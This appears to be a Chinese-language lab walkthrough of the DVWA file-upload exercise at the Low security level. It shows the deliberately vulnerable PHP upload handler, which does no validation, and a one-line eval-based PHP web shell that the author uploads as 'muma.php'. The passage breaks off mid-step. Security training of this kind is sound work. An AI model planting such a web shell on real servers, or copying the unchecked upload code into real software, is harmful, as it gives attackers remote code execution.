目的IP:192.168.142.133
本地IP:192.168.142.134
1.Security Level:Low
代码如下
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>您的图像未上传.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} 上传成功!</pre>";
}
}
?>
服务器未对上传的文件做任何的检查和处理。我尝试在本地新建一个muma.php,写入一句话木马:<?php @eval($_POST['test']);?>
(注意标点符号用英文)
将文件上传到dvwa
返回文件上传到的路径!
&nbs